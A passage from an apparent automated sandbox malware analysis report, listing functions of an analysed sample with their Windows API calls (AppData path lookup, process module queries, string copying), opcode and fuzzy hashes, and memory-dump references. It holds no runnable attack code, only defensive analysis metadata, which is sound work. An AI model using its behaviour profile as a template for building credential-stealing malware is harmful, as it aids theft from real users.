                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: strlen
                              • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                              • API String ID: 39653677-4138519520
                              • Opcode ID: ae251bb6e0396864492ef06804c0ae77f9d02c75b31d3a6f0c7d715b3c98f483
                              • Instruction ID: aa33db0f60f2c11401df7e4bd2f6c4ed685ab6a5f3b34e79d82c57ba0898d8a7
                              • Opcode Fuzzy Hash: ae251bb6e0396864492ef06804c0ae77f9d02c75b31d3a6f0c7d715b3c98f483
                              • Instruction Fuzzy Hash: 6E215C355112898FCB20EB35D4446EDF367DF813A7F84685ACD182B2C1E332190ED796
                              Function 00E4EB70 Relevance: 6.1, APIs: 4, Instructions: 90stringCOMMON
                              Download Yara Rule
                              APIs
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4EBB4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EBE3
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4EBF1
                              • lstrcat.KERNEL32(?,00D2F218), ref: 00E4EC0C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FolderPathlstrcpy
                              • String ID:
                              • API String ID: 818526691-0
                              • Opcode ID: 335fa5e5d62ef78130a77055fe1817db6fa2ae481bf5ab0a90c606f103eb8960
                              • Instruction ID: 1cad01788b5c3680df16ef1b420255fee682f4ff4fb2ce2a11be7fb5f7aaec24
                              • Opcode Fuzzy Hash: 335fa5e5d62ef78130a77055fe1817db6fa2ae481bf5ab0a90c606f103eb8960
                              • Instruction Fuzzy Hash: F9317471A10218AFDB25EB64EC46BED77F4BF48300F1054ADFA46A7251DA749E44CB90
                              Function 00E54480 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON
                              Download Yara Rule
                              APIs
                              • OpenProcess.KERNEL32(00000410,00000000), ref: 00E54492
                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00E544AD
                              • CloseHandle.KERNEL32(00000000), ref: 00E544B4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E544E7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                              • String ID:
                              • API String ID: 4028989146-0
                              • Opcode ID: 5b8daf24ff3330d1a4acad3aed1a767f955b58ad59b92375e0c2e1e463964d1f
                              • Instruction ID: 70d1b0c1070ef3a13fc04487cb486af07ef41731bf8dd2f985cf981812ddec0a
                              • Opcode Fuzzy Hash: 5b8daf24ff3330d1a4acad3aed1a767f955b58ad59b92375e0c2e1e463964d1f
                              • Instruction Fuzzy Hash: 6AF0C8F09416156FE730AB749C4DBE67BA8AB1430DF005595FFD5E71C0D6B488C48790
                              Function 00E58FD1 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00E58FDD
                                • Part of subcall function 00E587FF: __amsg_exit.LIBCMT ref: 00E5880F
                              • __getptd.LIBCMT ref: 00E58FF4
                              • __amsg_exit.LIBCMT ref: 00E59002
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00E59026
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: ac9fb7d6547b7a142153840b737c28bd7dc89c09dfdc07d57f1e5ec565340efa
                              • Instruction ID: c019437c8602b0b1b27223874895835345a13b771adf346849e1b6a081d80131
                              • Opcode Fuzzy Hash: ac9fb7d6547b7a142153840b737c28bd7dc89c09dfdc07d57f1e5ec565340efa
                              • Instruction Fuzzy Hash: 1AF0F632908710DBD720BB78680678E33E16F00717F242D09FC80B61D3CF64180CDA55
                              Function 00E57310 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(------,00E35BEB), ref: 00E5731B
                              • lstrcpy.KERNEL32(00000000), ref: 00E5733F
                              • lstrcat.KERNEL32(?,------), ref: 00E57349
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcatlstrcpylstrlen
                              • String ID: ------
                              • API String ID: 3050337572-882505780
                              • Opcode ID: 5fa424f16587dafb087ed6958cec1ec075ca117ae73803892e38e594e9f9a28c
                              • Instruction ID: 156fa3b5725a70ef51dd8e89cfdf00ff0588e097147286307fdeece804f8a96d
                              • Opcode Fuzzy Hash: 5fa424f16587dafb087ed6958cec1ec075ca117ae73803892e38e594e9f9a28c
                              • Instruction Fuzzy Hash: 56F0C9B45117029FDB249F35E84C926BBF9EF84715728982DACDAD7618E735D880CB10
                              Function 00E433D0 Relevance: 5.5, APIs: 4, Instructions: 486stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                                • Part of subcall function 00E31530: lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43422
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4344B
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43471
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E43497
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 3d9897dd11ea48281e5f69fc47f91e4639d55197901f519391d5308de395f8b5
                              • Instruction ID: cced83471cb8d023e1bd64c7b1937763144a5260b902c5acc78d95c9919671a6
                              • Opcode Fuzzy Hash: 3d9897dd11ea48281e5f69fc47f91e4639d55197901f519391d5308de395f8b5
                              • Instruction Fuzzy Hash: 9A12ED70A01201CFDB28CF29D558B25B7E5AF4471CB29D0AEE449EB3A6D776ED42CB40
                              Function 00E47C20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47C94
                              • std::_Xinvalid_argument.LIBCPMT ref: 00E47CAF
                                • Part of subcall function 00E47D40: std::_Xinvalid_argument.LIBCPMT ref: 00E47D58
                                • Part of subcall function 00E47D40: std::_Xinvalid_argument.LIBCPMT ref: 00E47D76
                                • Part of subcall function 00E47D40: std::_Xinvalid_argument.LIBCPMT ref: 00E47D91
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: string too long
                              • API String ID: 909987262-2556327735
                              • Opcode ID: c9fdee32a2b313720b82888d43e793e331d6ea4fd21b7a5fe48f1de5a2d0990b
                              • Instruction ID: 480ceae36ea8bff639dbecf8996635a02e50385141c04c3982220413021fd051
                              • Opcode Fuzzy Hash: c9fdee32a2b313720b82888d43e793e331d6ea4fd21b7a5fe48f1de5a2d0990b
                              • Instruction Fuzzy Hash: FF3109723086108BD734DE6CF8C096AF7E9EF95754B215A2AF5C1AB641C7719C8083E5
                              Function 00E36EF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00E36F74
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E36F7B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID: @
                              • API String ID: 1357844191-2766056989
                              • Opcode ID: f55bcbbe2a3b56ff5cf29d848c1c85317d2951877ced03e91ebb0144d319cbe2
                              • Instruction ID: 69cd3a8c9503e6ea97a85d750199238fb59799a28065f4529462f9a3d16e48e8
                              • Opcode Fuzzy Hash: f55bcbbe2a3b56ff5cf29d848c1c85317d2951877ced03e91ebb0144d319cbe2
                              • Instruction Fuzzy Hash: A9218171700601AFEB209F34D889BB677E8EB41708F448868F986DBA84E779E945C751
                              Function 00E51570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00E515A1
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E515D9
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51611
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51649
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: 476ee75daaf7756095138dce16c9e1222cd52c7ff3f023abf3e2ecf425e365ea
                              • Instruction ID: f13a7a56ff8659c330ec027172e486c0deaaba85e710914da4dba6084c4fc5df
                              • Opcode Fuzzy Hash: 476ee75daaf7756095138dce16c9e1222cd52c7ff3f023abf3e2ecf425e365ea
                              • Instruction Fuzzy Hash: 1D21F4B4601B029FD734AF2AD458B17B7E5AF84705F145A1CE8C6E7A40EB35E845CBA0
                              Function 00E31530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000), ref: 00E3162D
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000,?), ref: 00E3164F
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000,?), ref: 00E31671
                                • Part of subcall function 00E31610: lstrcpy.KERNEL32(00000000,?), ref: 00E31693
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31557
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31579
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3159B
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E315FF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID:
                              • API String ID: 3722407311-0
                              • Opcode ID: b2c45e2aa91a278ce7a0feb3b569c6aaf59492387d3e9cd73fffc58cb8c8bc88
                              • Instruction ID: 1d96c4ff192a2a25aeddda5912c1ffce38e5531b34311271ffbbd08665e4824f
                              • Opcode Fuzzy Hash: b2c45e2aa91a278ce7a0feb3b569c6aaf59492387d3e9cd73fffc58cb8c8bc88
                              • Instruction Fuzzy Hash: A631D474A01B02AFC724DF3AC588952BBF5BF88304B00592DE996D3B10DB34F811CB80
                              Function 00E31610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000), ref: 00E3162D
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E3164F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31671
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E31693
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                              • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmpDownload File
